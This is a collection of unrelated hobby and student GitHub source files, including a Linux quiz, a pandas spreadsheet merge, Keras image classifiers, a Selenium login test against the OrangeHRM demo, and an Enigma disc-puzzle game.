\"question\": \"Comment charger un module sur le cluster de l'IFB ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"module avail -l\",\n \"correct\": False\n },\n {\n \"code\": \"module load\",\n \"correct\": True\n },\n {\n \"code\": \"module charge\",\n \"correct\": False\n }\n ]\n },\n {\n \"question\": \"Comment se connecter au cluster de l'IFB ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"SSH\",\n \"correct\": True\n },\n {\n \"code\": \"Jypyter\",\n \"correct\": True\n },\n {\n \"code\": \"Galaxy\",\n \"correct\": True\n },\n {\n \"code\": \"En branchant mon ordinateur directement dessus\",\n \"correct\": False\n }\n ]\n },\n {\n \"question\": \"BASH est le seul langage compris par le Shell ?\",\n \"type\": \"multiple_choice\",\n \"answers\": [\n {\n \"code\": \"Vrai\",\n \"correct\": True,\n \"feedback\": \"Il y a aussi : bsh, ksh, csh, zsh,…\"\n },\n {\n \"code\": \"Faux\",\n \"correct\": False,\n \"feedback\": \"Il y a aussi : bsh, ksh, csh, zsh,…\"\n },\n ]\n }\n]\ndisplay_quiz(quizz)\n\n","repo_name":"IFB-ElixirFr/LinuxEBAII","sub_path":"docs/_build/jupyter_execute/quizz_01.py","file_name":"quizz_01.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32613673622","text":"from data_source.iprice import IPrice\r\nfrom model.price import Price\r\nfrom model.productCatalog import ProductCatalog\r\n\r\nclass TestPrice(IPrice):\r\n\r\n def get_last_price_for_product(self, productId) -> Price:\r\n return Price(\r\n 2, \r\n ProductCatalog(5, \"jjgjgjg\", \"jgjgjgj\", \"jfjfjf\", {}),\r\n \"2021-06-12\",\r\n 52.16\r\n )","repo_name":"Krysox/ProjetCleanArchitecture","sub_path":"data_source/test_price.py","file_name":"test_price.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23334763412","text":"from index_monkey.scrapers import snp500, xlb, xlc, xle, xlf, xli, xlk, xlp, xlre, xlu, xlv, xly\nimport datetime\nfrom index_monkey.loaders.price import PriceLoader\n\nINDEX_NAMES = [\n xlb.INDEX_NAME,\n xlc.INDEX_NAME,\n xle.INDEX_NAME,\n xlf.INDEX_NAME,\n xli.INDEX_NAME,\n xlk.INDEX_NAME,\n xlp.INDEX_NAME,\n xlre.INDEX_NAME,\n xlu.INDEX_NAME,\n xlv.INDEX_NAME,\n xly.INDEX_NAME,\n snp500.INDEX_NAME,\n]\n\n\ndef fetch_prices(start_date=None, end_date=None, indices=None):\n start_date = start_date or (datetime.date.today() - datetime.timedelta(days=2))\n end_date = end_date or (datetime.date.today() - datetime.timedelta(days=1))\n indices = indices or INDEX_NAMES\n for index in indices:\n p = PriceLoader(index, start_date, end_date, use_latest_index_weighting=True)\n p.fetch_prices()\n print(f'{index} price scraped between {start_date} and {end_date}')\n\n\nif __name__ == '__main__':\n start_date = datetime.date.today()\n end_date = start_date + datetime.timedelta(days=1)\n fetch_prices(start_date=start_date, end_date=end_date)\n","repo_name":"tradingwithpandas/IndexMonkey","sub_path":"index_monkey/loaders/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12904802296","text":"import pandas as pd\nfrom datetime import date\n\nfile_mps = 'C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\PLN_WW_O.xls.xlsx'\nfile_seg = 'C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\211011 - ABC RST Segmentation.xlsx'\n\nmps = pd.read_excel(file_mps)\nseg = pd.read_excel(file_seg)\n\nprint(mps.head())\n\n# Trim the space trailed in the columns of product file, Ex: 'Item ' => 'Item'\nmps.columns = mps.columns.str.rstrip()\n\n# Trim the space trailed in all rows of Item column, Ex: '8085-00481 ' => '8085-00481'\nmps['Item'] = mps['Item'].str.rstrip()\n\n# Print the first 10 rows the product panda object\nprint(mps.head(10))\n\n# Create the column \"Value\" on the MPS file to see the final ordering value\nmps['Value'] = mps['Frz Cost']*mps['Opn Qty']\n\n# Trim the space trailed in the columns of inventory file, Ex: 'Item CD ' => 'Item CD'\nseg.columns = seg.columns.str.rstrip()\nprint(seg.head())\n\n# Trim the space trailed in all rows of all columns, Ex: '8085-00481 ' => '8085-00481', 'A1X ' => 'A1X'\nseg['Item CD'] = seg['Item CD'].str.strip()\nseg['Segm'] = seg['Segm'].str.rstrip()\nseg['RST'] = seg['RST'].str.rstrip()\n\n# Check for duplicate values in seg file. \nprint(seg.duplicated().value_counts())\n\n# Merge seg file into the mps based on the 'Item' column in mps file and 'Item CD' column in seg.\n# This is equivalent to the vlookup function of Excel.\nmerged_file = mps.merge(seg, left_on = 'Item', right_on='Item CD', how='left')\nprint(merged_file.head(20))\n\n# Check the type of each column\nprint(merged_file.info())\n\n# Only select the columns you are interested in.\nmerged_file = merged_file[['Pref', 'Item', 'Rel Dte', 'Due Dte', 'Res Dte', 'Opn Qty', 'Lot Qty', 'Lead Time',\n 'Item Type', 'Vendr','Segm', 'RST', 'Description', 'Bu', 'Div', 'Mrkt',\n 'Frz Cost', 'Value', 'Fac', 'Pln', 'On Hand Qty', 'Opn MPS', 'R/O Trans', 'Opn CST', 'Avg Sales', 'Mth Cov','P/O Transit',\n 'U/M Conv']]\n\nprint(merged_file.columns)\n\n# Because Pandas will append the time into the date field, it will become something like 27/10/2021 12:00:00 AM.\nmerged_file['Rel Dte'] = merged_file['Rel Dte'].dt.normalize()\nmerged_file['Due Dte'] = merged_file['Due Dte'].dt.normalize()\n\n# Sort the merged file by Rel Dte \nmerged_file.sort_values(by=\"Rel Dte\", axis=0, inplace=True)\nprint(merged_file.head())\n\n# remove the rows with Vendr = 0\nmerged_file = merged_file[merged_file.Vendr != 0]\nprint(merged_file.head())\n\n# Save the merged_file to an excel file\n# Rename the file name before to run the code\nmerged_file.to_excel('C:\\\\Users\\\\ms3504\\\\Desktop\\\\Python Script\\\\Planner_file\\\\Planning_WW_PLN_O_week40.xlsx', index=False)\n","repo_name":"MelanieFR/Gates-Corporation","sub_path":"clean and merge for planners.py","file_name":"clean and merge for planners.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7681349532","text":"from flectra import models, fields\n\n\nclass AccountPayment(models.Model):\n _inherit = 'account.payment'\n\n x_account_analytic_account_id = fields.Many2one('account.analytic.account', string='Proyecto', store=True)\n x_name = fields.Char(string='Glosa', store=True);\n x_income_document_number = fields.Char(string='Nº Doc. Ingreso', store=True, index=True);\n x_is_charged = fields.Boolean(default=True, string='Cobrado?')\n\n _sql_constraints = [\n ('x_income_document_number', 'unique (x_income_document_number, payment_method_id, payment_type)', 'El Nº de documento debe ser único por método de pago!')\n ]\n","repo_name":"cv2310/flectra20-adra-programas","sub_path":"models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4853484178","text":"from keras.models import Sequential\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers.core import Activation, Flatten, Dense\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard\nfrom keras.optimizers import Adam\n\n\nclass LeNet:\n NUM_CLASS = 10\n IMG_ROWS, IMG_COLS = 28, 28\n INPUT_SHAPE = (IMG_ROWS, IMG_COLS, 1)\n\n EPOCH = 200\n BATCH_SIZE = 128\n VERBOSE = 2\n VALIDATION_SPLIT = 0.2\n OPTIMIZER = Adam()\n\n early_stopping = EarlyStopping(\n monitor='val_loss',\n patience=20,\n verbose=0,\n mode='auto'\n )\n checkpoint = ModelCheckpoint(filepath='model/LeNet.model', save_best_only=True)\n # tensorboard --logdir=CNN/log/\n tensorboard = TensorBoard(log_dir='log/', write_graph=False)\n\n model = None\n\n @classmethod\n def build(cls):\n cls.model = Sequential()\n\n cls.model.add(Conv2D(20, kernel_size=5, padding='same', input_shape=cls.INPUT_SHAPE))\n cls.model.add(Activation('relu'))\n cls.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n cls.model.add(Conv2D(50, kernel_size=5, padding='same'))\n cls.model.add(Activation('relu'))\n cls.model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n cls.model.add(Flatten())\n\n cls.model.add(Dense(500))\n cls.model.add(Activation('relu'))\n\n cls.model.add(Dense(cls.NUM_CLASS))\n cls.model.add(Activation(\"softmax\"))\n\n cls.model.summary()\n cls.model.compile(loss='categorical_crossentropy', optimizer=cls.OPTIMIZER, metrics=['accuracy'])\n\n @classmethod\n def get_data(cls):\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n X_train = X_train.reshape(-1, cls.IMG_ROWS, cls.IMG_COLS, 1) / 255.0\n X_test = X_test.reshape(-1, cls.IMG_ROWS, cls.IMG_COLS, 1) / 255.0\n\n y_train = np_utils.to_categorical(y_train, cls.NUM_CLASS)\n y_test = np_utils.to_categorical(y_test, cls.NUM_CLASS)\n\n return (X_train, y_train), (X_test, y_test)\n\n @classmethod\n def train(cls, X_train, y_train):\n cls.model.fit(X_train, y_train, batch_size=cls.BATCH_SIZE, epochs=cls.EPOCH, verbose=cls.VERBOSE,\n validation_split=cls.VALIDATION_SPLIT,\n callbacks=[cls.early_stopping, cls.checkpoint, cls.tensorboard])\n\n @classmethod\n def evaluate(cls, X_test, y_test):\n score = cls.model.evaluate(X_test, y_test, verbose=cls.VERBOSE)\n print(\"loss:\", score[0])\n print(\"accuracy:\", score[1])\n\n\nLeNet.build()\n(X_train, y_train), (X_test, y_test) = LeNet.get_data()\nLeNet.train(X_train, y_train)\nLeNet.evaluate(X_test, y_test)\n","repo_name":"govida/mlzoo","sub_path":"CNN/LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42346943666","text":"import pip\nimport sys\nimport subprocess\n\ndef install(package):\n if hasattr(pip, 'main'):\n pip.main(['install', package])\n else:\n pip._internal.main(['install', package])\n\ndef install(item_list):\n\t#Refer https://pip.pypa.io/en/latest/user_guide/#using-pip-from-your-program\n\ttry:\n\t\tinstalled_file = open('installed.txt','r')\n\t\tinstalled_list = installed_file.read().split('\\n')\n\t\titem_list = [x for x in item_list if x not in installed_list]\n\texcept Exception as e:\n\t\tprint(e)\n\t\n\tfor item in item_list:\n\t\tprint('Attempting install of {}'.format(item))\n\t\toutput = 0\n\t\ttry:\n\t\t\toutput = subprocess.run([sys.executable, '-m', 'pip', 'install', item], capture_output=True, check=True)\n\t\t\tif output.returncode==0:\n\t\t\t\tprint(str(output.stdout, 'utf-8'))\n\t\t\t\tprint('Completed Installation of {}'.format(item))\n\t\t\t\twith open('installed.txt', 'a') as installed_list:\n\t\t\t\t\tinstalled_list.write(item+'\\n')\n\t\t\telse:\n\t\t\t\tprint('Failure while installing {}'.format(item))\n\t\t\t\tprint(str(output.stderr, 'utf-8'))\n\t\t\t\tbreak\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\nif __name__ == '__main__':\n\twith open('requirements.txt', 'r') as requirements_list:\n\t\titems_list = requirements_list.read().split('\\n')\n\t\tinstall(items_list)\n\t\timport nltk\n\t\tnltk.download('all') \n \n","repo_name":"supratikchatterjee16/setup","sub_path":"installations.py","file_name":"installations.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73311797201","text":"from math import floor\r\n\r\ndef contfracsqrt(n):\r\n m = 0\r\n d = 1\r\n a = floor(n**0.5)\r\n h = []\r\n r = []\r\n while (m,d,a) not in h:\r\n h += [(m,d,a)]\r\n r += [a]\r\n m = d*a - m\r\n d = (n - m**2)/d\r\n a = floor(((n**0.5)+m)/d)\r\n return r\r\n\r\nc = 0\r\nfor n in range(1,10000):\r\n if floor(n**0.5) == n**0.5:\r\n pass\r\n else:\r\n if len(contfracsqrt(n)) % 2 == 0:\r\n c += 1\r\n\r\nprint(c)\r\n","repo_name":"americanjetset/project_euler","sub_path":"64.py","file_name":"64.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27452857517","text":"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport sys \r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\nimport cv2\r\nfrom sklearn.utils import class_weight\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nimport tensorflow as tf\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom tensorflow.keras.models import load_model\r\nimport tensorflow\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras import backend as K\r\n\r\npath = \"C:/Work/sgndataset/train/\"\r\nclass_names = sorted(os.listdir(path)) # need to correct\r\n\r\nbase_model = tf.keras.applications.mobilenet.MobileNet(\r\n input_shape = (224,224,3),\r\n include_top = False)\r\n\r\nbase_model.summary() # listing of the network structure\r\n\r\nin_tensor = base_model.inputs[0]\r\nout_tensor = base_model.outputs[0] \r\n # Grab the input of base model out_tensor = base_model.outputs[0]\r\n # Grab the output of base model\r\n # Add an average pooling layer (averaging each of the 1024 channels):\r\n \r\nout_tensor = tf.keras.layers.GlobalAveragePooling2D()(out_tensor)\r\n# Define the full model by the endpoints.\r\nmodel = tf.keras.models.Model(inputs = [in_tensor], outputs = [out_tensor])\r\n# Compile the model for execution. Losses and optimizers\r\n# can be anything here, since we don’t train the model. model.compile(loss = \"categorical_crossentropy\", optimizer = ’sgd’)\r\n\r\n# Find all image files in the data directory.\r\n\r\nX = [] # Feature vectors will go here.\r\ny = [] # Class ids will go here.\r\n\r\nfor root, dirs, files in os.walk(r\"C:/Work/sgndataset/train/\"):\r\n for name in files:\r\n # Load the image:\r\n if name.endswith(\".jpg\"):\r\n img = plt.imread(root + os.sep + name)\r\n \r\n # Resize it to the net input size:\r\n img = cv2.resize(img, (224, 224))\r\n \r\n # Convert the data to float, and remove mean:\r\n img = img.astype(np.float32)\r\n img -= 128\r\n \r\n # Push the data through the model:\r\n# x = model.predict(img[np.newaxis, ...])[0]\r\n \r\n # And append the feature vector to our list.\r\n X.append(img)\r\n \r\n # Extract class name from the directory name:\r\n label = root.split('/')[-1]\r\n y.append(class_names.index(label))\r\n\r\n# Cast the python lists to a numpy array.\r\nX = np.array(X)\r\ny = np.array(y)\r\nnum_classes = 17\r\n#np.save('X_data',X)\r\n#np.save('y_data',y)\r\nX=np.load('Ximg_data.npy')\r\nY=np.load('yimg_data.npy')\r\n\r\n\r\nX_train, X_tst, y_train, y_test = train_test_split(X, Y, test_size = 0.2)\r\n####\r\n\r\n# CALCULATE THE WEIGHTS \r\n\r\nclass_weights = class_weight.compute_class_weight('balanced',\r\n np.unique(y_train),\r\n y_train)\r\nclass_weights = dict(enumerate(class_weights))\r\n\r\ny_train = tensorflow.keras.utils.to_categorical(y_train, num_classes)\r\ny_test = tensorflow.keras.utils.to_categorical(y_test, num_classes)\r\n\r\ndatagen = ImageDataGenerator(\r\n featurewise_center=True,\r\n featurewise_std_normalization=True,\r\n rotation_range=20,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n# compute quantities required for featurewise normalization\r\n# (std, mean, and principal components if ZCA whitening is applied)\r\ndatagen.fit(X_train)\r\n# fits the model on batches with real-time data augmentation:\r\n\r\n\r\n\r\n\r\n# Classifiers\r\n\r\n#base_model = tensorflow.keras.applications.mobilenet.MobileNet(input_shape=(224,224,3),include_top = False, alpha=0.25)\r\n#base_model = tensorflow.keras.applications.mobilenet_v2.MobileNetV2(input_shape=(224,224,3),\r\n# alpha=1.0, include_top=False,\r\n# weights='imagenet', input_tensor=None, pooling=None, classes=17)\r\nbase_model = tensorflow.keras.applications.inception_v3.InceptionV3(include_top=False, weights='imagenet',\r\n input_tensor=None, input_shape=(224,224,3), pooling=None, classes=17)\r\n\r\n\r\n\r\n\r\nin_tensor = base_model.inputs[0] # Grab the input of base model\r\n# Grab the output of base model\r\nout_tensor = base_model.outputs[0]\r\nout_tensor =tensorflow.keras.layers.Flatten()(out_tensor)\r\nout_tensor =tensorflow.keras.layers.Dense(100, activation='relu')(out_tensor)\r\nout_tensor =tensorflow.keras.layers.Dense(17,activation='softmax')(out_tensor)\r\nmodel = tensorflow.keras.models.Model(inputs = [in_tensor],outputs = [out_tensor])\r\nmodel.summary()\r\nbatch_size = 50\r\n\r\nepochs = 30\r\n\r\nmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\r\n optimizer=tensorflow.keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\nmodel.fit_generator(datagen.flow(X_train, y_train, batch_size=128),\r\n steps_per_epoch=len(X_train) /128, epochs=15)\r\n\r\nmodel.fit(X_train, y_train,batch_size=batch_size,epochs=epochs,\r\n class_weight=class_weights,verbose=1,validation_data=(X_tst, y_test))\r\nscore = model.evaluate(X_tst, y_test, verbose=0)\r\n\r\nprint('Test loss:', score[0])\r\n\r\nprint('Test accuracy:', score[1])\r\n\r\n\r\nfrom pathlib import Path\r\n\r\n\r\n\r\nmodel=load_model('incep_trial_weights.h5')\r\n\r\n\r\nbasepath = Path(\"C:/Work/sgndataset/testset/\")\r\nfiles_in_basepath = basepath.iterdir()\r\nwith open(\"submission.csv\", \"w\") as fp:\r\n fp.write(\"Id,Category\\n\")\r\n for image in files_in_basepath:\r\n# print(image)\r\n img = plt.imread(image)\r\n image=str(image).split('\\\\')[-1]\r\n image=image.split('.')[0]\r\n img = cv2.resize(img, (224, 224))\r\n#\r\n img = img.astype(np.float32)\r\n img -= 128\r\n#\r\n pred=model.predict(img[np.newaxis, ...])[0]\r\n index = np.argmax(pred, axis=0)\r\n # Extract class name from the directory name:\r\n label = class_names[index]\r\n fp.write(\"%d,%s\\n\" % (int(image), label))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mouna96/PrMl","sub_path":"competitionpart2.py","file_name":"competitionpart2.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26168202372","text":"from selenium import webdriver\nimport time\nimport unittest\nimport HtmlTestRunner\n\nimport sys\nsys.path.append(\"/Users/sathu/PycharmProjects/OrangeHRMSite\")\n\n\nfrom SampleProjects.POMProjectDemo.Pages.loginpage import loginpage\nfrom SampleProjects.POMProjectDemo.Pages.Homepage import Homepage\n\n\nclass loginTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome()\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n\n def test_01_login_valid(self):\n driver = self.driver\n driver.get(\"https://opensource-demo.orangehrmlive.com/\")\n\n login = loginpage(driver)\n login.enter_username(\"Admin\")\n login.enter_password(\"admin123\")\n time.sleep(3)\n login.click_login()\n time.sleep(2)\n\n homepage = Homepage(driver)\n homepage.click_welcome()\n time.sleep(2)\n homepage.click_logout()\n time.sleep(2)\n #self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n #self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n #self.driver.find_element_by_id(\"btnLogin\").click()\n #time.sleep(3)\n #self.driver.find_element_by_xpath(\"//*[@id='welcome']\").click()\n #time.sleep(3)\n #self.driver.find_element_by_link_text(\"Logout\").click()\n #time.sleep(2)\n\n\n def test_02_login_Invalid_username(self):\n driver2 = self.driver\n driver2.get(\"https://opensource-demo.orangehrmlive.com/\")\n\n login2 = loginpage(driver2)\n login2.enter_username(\"Admim1\")\n login2.enter_password(\"admin2123\")\n time.sleep(3)\n login2.click_login()\n time.sleep(2)\n message = driver2.find_element_by_xpath(\"\").text\n self.assertEqual(message, \"Invalid credentials123\" )\n\n #self.driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n #self.driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n #self.driver.find_element_by_id(\"btnLogin\").click()\n #time.sleep(3)\n #self.driver.find_element_by_xpath(\"//*[@id='welcome']\").click()\n #time.sleep(3)\n #self.driver.find_element_by_link_text(\"Logout\").click()\n #time.sleep(2)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n cls.driver.quit()\n print(\"Test Completed\")\n\nif __name__ == '__main__':\n unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output='/Users/sathu/PycharmProjects/OrangeHRMSite/Reports'))","repo_name":"sathappan1989/OrangeHRMSite","sub_path":"SampleProjects/POMProjectDemo/Tests/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12996800206","text":"\nimport random\nimport time\nfrom enum import Enum\n\nimport EnigmaGame.const as const\nfrom EnigmaGame.blocks import Blocks\nfrom EnigmaGame.figure import Figure\n\n\nclass Disc(Enum):\n LOWER = 0\n UPPER = 1\n\n\nclass Direction(Enum):\n RIGHT = 0\n LEFT = 1\n\n\nclass Board:\n\n def __init__(self):\n\n self.numTurns = 20\n self.bShowTurns = False\n self.level = 1\n self.startTime = None\n\n self.upperCenterX = 116.60\n self.upperCenterY = 200\n self.lowerCenterX = 116.60\n self.lowerCenterY = 100\n\n self.moves = []\n self.gameActive = False\n self.gameMoves = 0\n self.gameSuccess = False\n\n self.upperBones = []\n self.lowerBones = []\n self.upperStones = []\n self.lowerStones = []\n\n self.stones = []\n self.bones = []\n self.frame = None\n\n self.w = 230\n self.h = 300\n\n self.init_board()\n\n def init_board(self):\n self.numTurns = 20\n self.bShowTurns = False\n\n self.gameActive = False\n self.moves = []\n self.gameMoves = 0\n\n self.upperBones = [0] * 6\n self.lowerBones = [0] * 6\n self.upperStones = [0] * 6\n self.lowerStones = [0] * 6\n\n self.stones = []\n for i in range(0, 10):\n self.stones.append(Figure())\n\n self.bones = []\n for i in range(0, 11):\n self.bones.append(Figure())\n\n self.frame = Figure()\n\n Blocks.color_blocks(self.level)\n\n self.bones[0].add_block(28)\n self.bones[0].add_block(29)\n\n for i in range(1, 6):\n self.bones[i].add_block(5 * (i - 1) + 3)\n self.bones[i].add_block(5 * (i - 1) + 4)\n\n for i in range(0, 6):\n self.stones[i].add_block(5 * i)\n self.stones[i].add_block(5 * i + 1)\n self.stones[i].add_block(5 * i + 2)\n\n for i in range(6, 11):\n self.bones[i].add_block(5 * i)\n self.bones[i].add_block(5 * i + 1)\n\n for i in range(6, 10):\n self.stones[i].add_block(5 * i + 2)\n self.stones[i].add_block(5 * i + 3)\n self.stones[i].add_block(5 * i + 4)\n\n for i in range(0, 12):\n self.frame.add_block(i + 52)\n\n for i in range(0, 6):\n self.upperBones[i] = i\n self.lowerBones[i] = i + 5\n self.upperStones[i] = i\n self.lowerStones[i] = i + 4\n\n self.upperCenterX = 116.60\n self.upperCenterY = 200\n self.lowerCenterX = 116.60\n self.lowerCenterY = 100\n\n self.w = 230\n self.h = 300\n\n def on_resize(self, w, h):\n dx = 1.0 * w / self.w\n dy = 1.0 * h / self.h\n\n Blocks.scale_blocks(dx)\n\n self.upperCenterX = self.upperCenterX * dx\n self.upperCenterY = self.upperCenterY * dy\n self.lowerCenterX = self.lowerCenterX * dx\n self.lowerCenterY = self.lowerCenterY * dy\n\n self.h = h\n self.w = w\n\n def get_middle_x(self):\n return (self.upperCenterX + self.lowerCenterX) / 2.0\n\n def get_middle_y(self):\n return (self.upperCenterY + self.lowerCenterY) / 2.0\n\n def get_runtime(self):\n return int(time.time() - self.startTime)\n\n def get_turns(self):\n return len(self.moves) - self.gameMoves\n\n def on_draw(self):\n self.draw_background()\n self.draw_upper_disk()\n self.draw_lower_disk()\n\n def draw_background(self):\n self.frame.draw()\n\n def draw_upper_disk(self):\n\n for i in range(0, 6):\n self.bones[self.upperBones[i]].draw()\n self.stones[self.upperStones[i]].draw()\n pass\n\n def draw_lower_disk(self):\n for i in range(0, 6):\n self.bones[self.lowerBones[i]].draw()\n self.stones[self.lowerStones[i]].draw()\n pass\n\n def turn_disc(self, direction: Direction, disc: Disc):\n new_bones = [0] * 6\n new_stones = [0] * 6\n\n self.moves.append([direction, disc])\n\n if disc == Disc.UPPER:\n if direction == Direction.LEFT:\n for i in range(0, 6):\n if self.upperStones[i] >= 6:\n self.stones[self.upperStones[i]].inc_orient()\n\n idx = i + 5\n if idx > 5:\n idx -= 6\n\n new_bones[idx] = self.upperBones[i]\n new_stones[idx] = self.upperStones[i]\n\n else:\n for i in range(0, 6):\n if self.upperStones[i] >= 6:\n self.stones[self.upperStones[i]].dec_orient()\n\n idx = i - 5\n if idx < 0:\n idx += 6\n new_bones[idx] = self.upperBones[i]\n new_stones[idx] = self.upperStones[i]\n\n for i in range(0, 6):\n self.upperBones[i] = new_bones[i]\n self.upperStones[i] = new_stones[i]\n\n self.lowerBones[0] = self.upperBones[5]\n self.lowerStones[0] = self.upperStones[4]\n self.lowerStones[1] = self.upperStones[5]\n else:\n if direction == Direction.RIGHT:\n for i in range(0, 6):\n if self.lowerStones[i] < 6:\n self.stones[self.lowerStones[i]].inc_orient()\n\n idx = i + 5\n if idx > 5:\n idx -= 6\n new_bones[idx] = self.lowerBones[i]\n new_stones[idx] = self.lowerStones[i]\n else:\n for i in range(0, 6):\n if self.lowerStones[i] < 6:\n self.stones[self.lowerStones[i]].dec_orient()\n\n idx = i - 5\n if idx < 0:\n idx += 6\n\n new_bones[idx] = self.lowerBones[i]\n new_stones[idx] = self.lowerStones[i]\n\n for i in range(0, 6):\n self.lowerBones[i] = new_bones[i]\n self.lowerStones[i] = new_stones[i]\n\n self.upperBones[5] = self.lowerBones[0]\n self.upperStones[4] = self.lowerStones[0]\n self.upperStones[5] = self.lowerStones[1]\n\n if self.gameActive:\n s0 = self.get_color_string()\n s1 = Blocks.get_color_string()\n if s0 == s1:\n self.gameActive = False\n self.gameSuccess = True\n\n def rotate_disc(self, direction: Direction, disc: Disc, deg):\n if disc == Disc.UPPER:\n if direction == Direction.RIGHT:\n deg = -deg\n self.rotate(self.upperBones, self.upperStones, self.upperCenterX, self.upperCenterY, deg)\n else:\n if direction == Direction.RIGHT:\n deg = -deg\n self.rotate(self.lowerBones, self.lowerStones, self.lowerCenterX, self.lowerCenterY, deg)\n\n def rotate(self, bones, stones, cx, cy, deg):\n for i in range(0, 6):\n self.bones[bones[i]].rotate(deg, cx, cy)\n self.stones[stones[i]].rotate(deg, cx, cy)\n\n def get_color_string(self):\n sb = \"\"\n for i in range(0, 5):\n sb = sb + self.stones[self.upperStones[i]].get_color_string()\n sb = sb + self.bones[self.upperBones[i + 1]].get_color_string()\n\n sb = sb + self.stones[self.upperStones[5]].get_color_string()\n sb = sb + self.bones[self.upperBones[0]].get_color_string()\n\n sb = sb + self.bones[self.lowerBones[1]].get_color_string()\n for i in range(2, 6):\n sb = sb + self.stones[self.lowerStones[i]].get_color_string()\n sb = sb + self.bones[self.lowerBones[i]].get_color_string()\n\n return sb\n\n def get_level(self):\n return const.LEVELS[self.level]\n\n def level_up(self):\n if self.level == 10:\n return\n\n self.level = self.level + 1\n self.gameActive = False\n self.gameSuccess = False\n self.init_board()\n\n def level_down(self):\n if self.level == 0:\n return\n\n self.level = self.level - 1\n self.gameActive = False\n self.gameSuccess = False\n self.init_board()\n\n def new_game(self):\n self.init_board()\n\n self.numTurns = 20\n self.bShowTurns = False\n self.gameActive = False\n self.gameSuccess = False\n self.moves = []\n self.gameMoves = 0\n self.startTime = time.time()\n\n for i in range(0, self.numTurns):\n direction = Direction.RIGHT\n disc = Disc.UPPER\n if i % 2 == 0:\n disc = Disc.LOWER\n\n anz = random.randint(1, 6)\n if anz > 3:\n direction = Direction.LEFT\n anz = anz - 3\n\n self.gameMoves += anz\n\n for j in range(0, anz):\n self.turn_disc(direction, disc)\n self.rotate_disc(direction, disc, 60.0)\n if self.bShowTurns:\n pass\n\n s = self.get_color_string()\n s1 = Blocks.get_color_string()\n if s == s1:\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n self.turn_disc(Direction.RIGHT, Disc.LOWER)\n self.rotate_disc(Direction.RIGHT, Disc.LOWER, 60.0)\n\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, Disc.UPPER, 60.0)\n self.turn_disc(Direction.LEFT, Disc.UPPER)\n self.rotate_disc(Direction.LEFT, 